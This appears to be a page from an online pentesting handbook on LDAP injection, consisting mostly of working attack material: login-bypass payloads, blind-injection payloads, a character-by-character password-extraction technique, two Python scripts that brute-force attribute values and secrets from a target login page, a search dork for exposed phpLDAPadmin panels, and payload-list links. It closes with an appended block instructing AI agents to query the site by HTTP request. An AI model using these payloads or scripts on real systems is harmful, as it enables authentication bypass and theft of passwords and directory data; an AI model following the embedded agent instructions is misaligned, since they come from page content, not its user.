# LDAP Injection

### **LDAP**

**If you want to know what is LDAP access the following page:**

{% page-ref page="../pentesting/pentesting-ldap.md" %}

**LDAP Injection** is an attack used to **exploit** **web** based applications that construct **LDAP** **statements** based on **user** **input**. When an application **fails** to properly **sanitize** user input, it's possible to modify LDAP statements using a local proxy.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filter** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = *'=' / '\~=' / '>=' / '<='*\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
\&#xNAN;**(&)** = Absolute TRUE\
\&#xNAN;**(|)** = Absolute FALSE

For example:\
`(&(!(objectClass=Impresoras))(uid=s*)) (&(objectClass=user)(uid=*))`

You can access to the database, and this can content information of a lot of different types.

**OpenLDAP**: If 2 filters arrive, only executes the first one.\
**ADAM or Microsoft LDS**: With 2 filters they throw an error.\
**SunOne Directory Server 5.0**: Execute both filters.

**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**

The filter has to start with: `&` or `|`\
Example: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*)) VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter (the one executed).

### Login Bypass

LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.

```
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```

#### Lists

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
* [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
* [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Blind LDAP Injection

You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:

```
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```

#### Dump data

You can iterate over the ascii letters, digits and symbols:

```
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```

### Scripts

#### **Discover valid LDAP fields**

LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).

```
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet: #In each possition test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login':query, 'password':'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break

            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
                finish = True
                print()
```

#### **Special Blind LDAP Injection (without "\*")**

```
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
```

### Google Dorks

```
intitle:"phpLDAPadmin" inurl:cmd.php
```

### More Payloads

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://n3t-hunt3r.gitbook.io/pentest-book/web-application-pentesting/ldap-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.